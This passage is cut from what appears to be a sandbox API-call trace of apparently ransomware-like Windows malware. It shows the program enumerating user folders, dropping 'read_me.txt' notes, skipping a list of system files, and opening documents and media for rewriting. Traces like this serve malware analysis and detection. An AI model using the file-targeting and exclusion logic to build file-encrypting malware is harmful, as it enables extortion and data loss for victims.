dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7b0 [0073.838] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.838] CloseHandle (hObject=0x7b0) returned 1 [0073.838] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.838] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.838] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt") returned 29 [0073.838] GetProcessHeap () returned 0x280000 [0073.838] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b80120 | out: hHeap=0x280000) returned 1 [0073.838] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 9 [0073.839] GetProcessHeap () returned 0x280000 [0073.839] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a900a8 | out: hHeap=0x280000) returned 1 [0073.940] GetProcessHeap () returned 0x280000 [0073.940] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ad00c8 [0073.941] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\System Volume Information\\*") returned 34 [0073.941] FindFirstFileW (in: lpFileName="\\\\?\\C:\\System Volume Information\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0073.941] wnsprintfW (in: pszDest=0x8ad00c8, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\System Volume Information\\read_me.txt") returned 44 [0073.941] GetProcessHeap () returned 0x280000 [0073.941] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ad00c8 | out: hHeap=0x280000) returned 1 [0073.941] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 32 [0073.941] GetProcessHeap () returned 0x280000 [0073.941] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b70118 | out: hHeap=0x280000) returned 1 [0073.988] GetProcessHeap () returned 0x280000 [0073.989] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8ba0130 [0073.990] wnsprintfW (in: pszDest=0x8ba0130, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned 43 [0073.990] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0xffffffff [0073.990] wnsprintfW (in: pszDest=0x8ba0130, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\read_me.txt") returned 53 [0073.990] GetProcessHeap () returned 0x280000 [0073.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8ba0130 | out: hHeap=0x280000) returned 1 [0073.990] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 37 [0073.990] GetProcessHeap () returned 0x280000 [0073.990] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a800a0 | out: hHeap=0x280000) returned 1 [0074.009] GetProcessHeap () returned 0x280000 [0074.009] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a30078 [0074.009] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 43 [0074.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ac0ef0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ac0ef0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b26f8 [0074.010] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 43 [0074.010] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x16ac0ef0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16ac0ef0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0074.010] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\..") returned 44 [0074.010] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d85570, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0xaaabbc90, ftLastAccessTime.dwHighDateTime=0x1d4c908, ftLastWriteTime.dwLowDateTime=0xaaabbc90, ftLastWriteTime.dwHighDateTime=0x1d4c908, nFileSizeHigh=0x0, nFileSizeLow=0x369a, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="4HKKgFKeIA-tj8p.mkv", cAlternateFileName="4HKKGF~1.MKV")) returned 1 [0074.010] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4HKKgFKeIA-tj8p.mkv") returned 61 [0074.010] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4HKKgFKeIA-tj8p.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\4hkkgfkeia-tj8p.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x778 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="read_me.txt") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="autoexec.bat") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="desktop.ini") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="autorun.inf") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="ntuser.dat") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="iconcache.db") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="bootsect.bak") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="boot.ini") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="ntuser.dat.log") returned 0x0 [0074.010] StrStrW (lpFirst="4hkkgfkeia-tj8p.mkv", lpSrch="thumbs.db") returned 0x0 [0074.010] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 9 [0074.010] QueueUserWorkItem (Function=0x404e00, Context=0x778, Flags=0x0) returned 1 [0074.010] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7d09340, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x16a4ead0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a4ead0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="9-1Wl49_LbKQ0", cAlternateFileName="9-1WL4~1")) returned 1 [0074.010] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0") returned 55 [0074.011] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x815ab880, ftCreationTime.dwHighDateTime=0x1d4ce32, ftLastAccessTime.dwLowDateTime=0x81bd2240, ftLastAccessTime.dwHighDateTime=0x1d4c8ec, ftLastWriteTime.dwLowDateTime=0x81bd2240, ftLastWriteTime.dwHighDateTime=0x1d4c8ec, nFileSizeHigh=0x0, nFileSizeLow=0x5359, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="98KbAKVzLCjvlVD.mp3", cAlternateFileName="98KBAK~1.MP3")) returned 1 [0074.011] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98KbAKVzLCjvlVD.mp3") returned 61 [0074.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\98KbAKVzLCjvlVD.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\98kbakvzlcjvlvd.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c4 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="read_me.txt") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="autoexec.bat") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="desktop.ini") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="autorun.inf") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="ntuser.dat") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="iconcache.db") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="bootsect.bak") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="boot.ini") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="ntuser.dat.log") returned 0x0 [0074.011] StrStrW (lpFirst="98kbakvzlcjvlvd.mp3", lpSrch="thumbs.db") returned 0x0 [0074.011] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 10 [0074.011] QueueUserWorkItem (Function=0x404e00, Context=0x7c4, Flags=0x0) returned 1 [0074.011] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfbaa6c10, ftCreationTime.dwHighDateTime=0x1d4d117, ftLastAccessTime.dwLowDateTime=0x16a74c30, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16a74c30, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="aeutpKYrnLsv9u1", cAlternateFileName="AEUTPK~1")) returned 1 [0074.011] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\aeutpKYrnLsv9u1") returned 57 [0074.011] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x11127da0, ftCreationTime.dwHighDateTime=0x1d4ca3c, ftLastAccessTime.dwLowDateTime=0x155f13f0, ftLastAccessTime.dwHighDateTime=0x1d4c6e5, ftLastWriteTime.dwLowDateTime=0x155f13f0, ftLastWriteTime.dwHighDateTime=0x1d4c6e5, nFileSizeHigh=0x0, nFileSizeLow=0x17c6f, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="bCgEZVX9L9jQz2qWVKNz.gif", cAlternateFileName="BCGEZV~1.GIF")) returned 1 [0074.011] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bCgEZVX9L9jQz2qWVKNz.gif") returned 66 [0074.011] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bCgEZVX9L9jQz2qWVKNz.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\bcgezvx9l9jqz2qwvknz.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x784 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="read_me.txt") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="autoexec.bat") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="desktop.ini") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="autorun.inf") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="ntuser.dat") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="iconcache.db") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="bootsect.bak") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="boot.ini") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="ntuser.dat.log") returned 0x0 [0074.012] StrStrW (lpFirst="bcgezvx9l9jqz2qwvknz.gif", lpSrch="thumbs.db") returned 0x0 [0074.012] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 11 [0074.012] QueueUserWorkItem (Function=0x404e00, Context=0x784, Flags=0x0) returned 1 [0074.012] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0074.012] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini") returned 53 [0074.012] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x788 [0074.012] StrStrW (lpFirst="desktop.ini", lpSrch="read_me.txt") returned 0x0 [0074.012] StrStrW (lpFirst="desktop.ini", lpSrch="autoexec.bat") returned 0x0 [0074.012] StrStrW (lpFirst="desktop.ini", lpSrch="desktop.ini") returned="desktop.ini" [0074.012] CloseHandle (hObject=0x788) returned 1 [0074.013] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x44cf8ae0, ftCreationTime.dwHighDateTime=0x1d4cebd, ftLastAccessTime.dwLowDateTime=0x95068550, ftLastAccessTime.dwHighDateTime=0x1d4c5fc, ftLastWriteTime.dwLowDateTime=0x95068550, ftLastWriteTime.dwHighDateTime=0x1d4c5fc, nFileSizeHigh=0x0, nFileSizeLow=0x18f23, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="em--siXz NglZ-An.png", cAlternateFileName="EM--SI~1.PNG")) returned 1 [0074.013] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\em--siXz NglZ-An.png") returned 62 [0074.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\em--siXz NglZ-An.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\em--sixz nglz-an.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x788 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="read_me.txt") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="autoexec.bat") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="desktop.ini") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="autorun.inf") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="ntuser.dat") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="iconcache.db") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="bootsect.bak") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="boot.ini") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="ntuser.dat.log") returned 0x0 [0074.013] StrStrW (lpFirst="em--sixz nglz-an.png", lpSrch="thumbs.db") returned 0x0 [0074.013] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 12 [0074.013] QueueUserWorkItem (Function=0x404e00, Context=0x788, Flags=0x0) returned 1 [0074.013] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x961be860, ftCreationTime.dwHighDateTime=0x1d4d45f, ftLastAccessTime.dwLowDateTime=0x1c02e830, ftLastAccessTime.dwHighDateTime=0x1d4d31a, ftLastWriteTime.dwLowDateTime=0x1c02e830, ftLastWriteTime.dwHighDateTime=0x1d4d31a, nFileSizeHigh=0x0, nFileSizeLow=0x8cf8, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="FsOU4o0hMFpPBRbA.doc", cAlternateFileName="FSOU4O~1.DOC")) returned 1 [0074.013] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FsOU4o0hMFpPBRbA.doc") returned 62 [0074.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\FsOU4o0hMFpPBRbA.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\fsou4o0hmfppbrba.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x77c [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="read_me.txt") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="autoexec.bat") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="desktop.ini") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="autorun.inf") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="ntuser.dat") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="iconcache.db") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="bootsect.bak") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="boot.ini") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="ntuser.dat.log") returned 0x0 [0074.014] StrStrW (lpFirst="fsou4o0hmfppbrba.doc", lpSrch="thumbs.db") returned 0x0 [0074.014] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 13 [0074.014] QueueUserWorkItem (Function=0x404e00, Context=0x77c, Flags=0x0) returned 1 [0074.014] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfbb0cc10, ftCreationTime.dwHighDateTime=0x1d4ca71, ftLastAccessTime.dwLowDateTime=0xe439100, ftLastAccessTime.dwHighDateTime=0x1d4cd6f, ftLastWriteTime.dwLowDateTime=0xe439100, ftLastWriteTime.dwHighDateTime=0x1d4cd6f, nFileSizeHigh=0x0, nFileSizeLow=0xac3c, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="HfYjszBjyIVWutWh.gif", cAlternateFileName="HFYJSZ~1.GIF")) returned 1 [0074.014] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HfYjszBjyIVWutWh.gif") returned 62 [0074.014] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HfYjszBjyIVWutWh.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\hfyjszbjyivwutwh.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7c8 [0074.014] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="read_me.txt") returned 0x0 [0074.014] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="autoexec.bat") returned 0x0 [0074.014] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="desktop.ini") returned 0x0 [0074.014] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="autorun.inf") returned 0x0 [0074.015] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="ntuser.dat") returned 0x0 [0074.015] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="iconcache.db") returned 0x0 [0074.015] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="bootsect.bak") returned 0x0 [0074.015] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="boot.ini") returned 0x0 [0074.015] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="ntuser.dat.log") returned 0x0 [0074.015] StrStrW (lpFirst="hfyjszbjyivwutwh.gif", lpSrch="thumbs.db") returned 0x0 [0074.015] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 14 [0074.015] QueueUserWorkItem (Function=0x404e00, Context=0x7c8, Flags=0x0) returned 1 [0074.015] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0f72ac0, ftCreationTime.dwHighDateTime=0x1d4c59e, ftLastAccessTime.dwLowDateTime=0xf50f0f40, ftLastAccessTime.dwHighDateTime=0x1d4cdd5, ftLastWriteTime.dwLowDateTime=0xf50f0f40, ftLastWriteTime.dwHighDateTime=0x1d4cdd5, nFileSizeHigh=0x0, nFileSizeLow=0x14cc9, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="jGcvWPRC.csv", cAlternateFileName="")) returned 1 [0074.015] wnsprintfW (in: pszDest=0x8a30078, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jGcvWPRC.csv") returned 54 [0074.015] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\jGcvWPRC.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\jgcvwprc.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x79c [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="read_me.txt") returned 0x0 [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="autoexec.bat") returned 0x0 [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="desktop.ini") returned 0x0 [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="autorun.inf") returned 0x0 [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="ntuser.dat") returned 0x0 [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="iconcache.db") returned 0x0 [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="bootsect.bak") returned 0x0 [0074.015] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="boot.ini") returned 0x0 [0074.016] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="ntuser.dat.log") returned 0x0 [0074.016] StrStrW (lpFirst="jgcvwprc.csv", lpSrch="thumbs.db") returned 0x0 [0074.016] InterlockedExchangeAdd (in: Addend=0x40f064, Value=1 | out: Addend=0x40f064) returned 15 [0074.016] QueueUserWorkItem (Function=0x404e00, Context=0x79c, Flags=0x0) returned 1 [0074.016] FindNextFileW (in: hFindFile=0x2b26f8, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x713bc110, ftCreationTime.dwHighDateTime=0x1d4cfc7, ftLastAccessTime.dwLowDateTime=0xdc51c620, ftLastAccessTime.dwHighDateTime=0x1d4c635, ftLastWriteTime.dwLowDateTime=0xdc51c620, ftLastWriteTime.dwHighDateTime=0x1d4c635, nFileSizeHigh=0x0, 